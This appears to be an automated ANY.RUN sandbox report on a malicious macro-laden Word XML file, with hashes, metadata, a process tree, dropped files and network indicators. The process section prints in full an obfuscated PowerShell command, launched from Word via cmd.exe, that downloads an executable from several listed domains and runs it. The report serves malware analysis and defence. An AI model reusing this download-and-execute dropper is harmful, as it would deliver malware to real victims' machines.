analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DOC-09373.doc

Full analysis: https://app.any.run/tasks/0df88169-bcf7-474e-a85a-994873e6c80d
Verdict: Malicious activity
Analysis date: January 22, 2019, 16:58:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

D88A6CFA5798232BF0839F214336ABFB

SHA1:

5ECF11EF14EE4E56BB0F274D16B17F11D3FB82E0

SHA256:

223BDD78DE84AA3E64715925E1364C2A207CD09CFC06D987AAFFCD0A9A396DE2

SSDEEP:

6144:6v/ybBPDDMkqWqs6vOtX0OEDzYUTE7yZRVUi8E:4/GJsOtX0BzEmZRGi7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2968)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3936)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2968)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2500)
    • Executes application which crashes

      • powershell.exe (PID: 2500)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2968)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 15
WordDocumentDocumentPropertiesCharacters: 86
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 100
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (Binary data 96630 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00554C54
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00554C54
WordDocumentBodySectPRRsidRPr: 005241E0
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-09373.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3936"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2500powershell $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3060"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 332
Read events
933
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B1E.tmp.cvr
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B80488F.jpg
MD5:
SHA256:
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AH2QS4CJN5PU6E9NLE4Z.temp
MD5:
SHA256:
3060ntvdm.exeC:\Users\admin\AppData\Local\Temp\scsBA09.tmp
MD5:
SHA256:
3060ntvdm.exeC:\Users\admin\AppData\Local\Temp\scsBA0A.tmp
MD5:
SHA256:
2968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B6ECEC136F257DBEEC2A501813555CA9
SHA256:F3B8DE5FAA34C54EB1DDA6A87A0F1EA2FF12E83AA4443628DFF63C18488F4D3A
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C-09373.docpgc
MD5:B726507BC5AEC69E2111FA24B964614E
SHA256:E3F3B817B1DF093904BE32788AD6C647F4F030BE5E8250ED7BB9CD819A3C93B3
2500powershell.exeC:\Users\Public\486.exedocument
MD5:36DF9616987F412949FEE98EA9F06C97
SHA256:C2E393FF568F4A87CE48011F10664138E569710F56DDC0462AA7F36BDAD5ECAD
2500powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247417.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2500
powershell.exe
GET
404
162.144.176.69:80
http://www.ipbempreende.com.br/d2gp7Tj_xfPR2
US
html
403 b
unknown
2500
powershell.exe
GET
403
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh
ZA
html
341 b
malicious
2500
powershell.exe
GET
301
87.98.154.146:80
http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN
FR
html
265 b
malicious
2500
powershell.exe
GET
404
45.32.168.77:80
http://plottermais.com/geYz_l5Du
US
text
25 b
unknown
2500
powershell.exe
GET
200
87.98.154.146:80
http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN/
FR
document
124 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2500
powershell.exe
162.144.176.69:80
www.ipbempreende.com.br
Unified Layer
US
unknown
2500
powershell.exe
154.0.164.160:80
fleetstreetstudios.co.za
Afrihost
ZA
suspicious
2500
powershell.exe
45.32.168.77:80
plottermais.com
Choopa, LLC
US
unknown
2500
powershell.exe
87.98.154.146:80
aplusglass-parebrise-anet.fr
OVH SAS
FR
malicious

DNS requests

Domain
IP
Reputation
fleetstreetstudios.co.za
  • 154.0.164.160
malicious
pentick.space
unknown
www.ipbempreende.com.br
  • 162.144.176.69
unknown
plottermais.com
  • 45.32.168.77
unknown
aplusglass-parebrise-anet.fr
  • 87.98.154.146
malicious

Threats

No threats detected
No debug info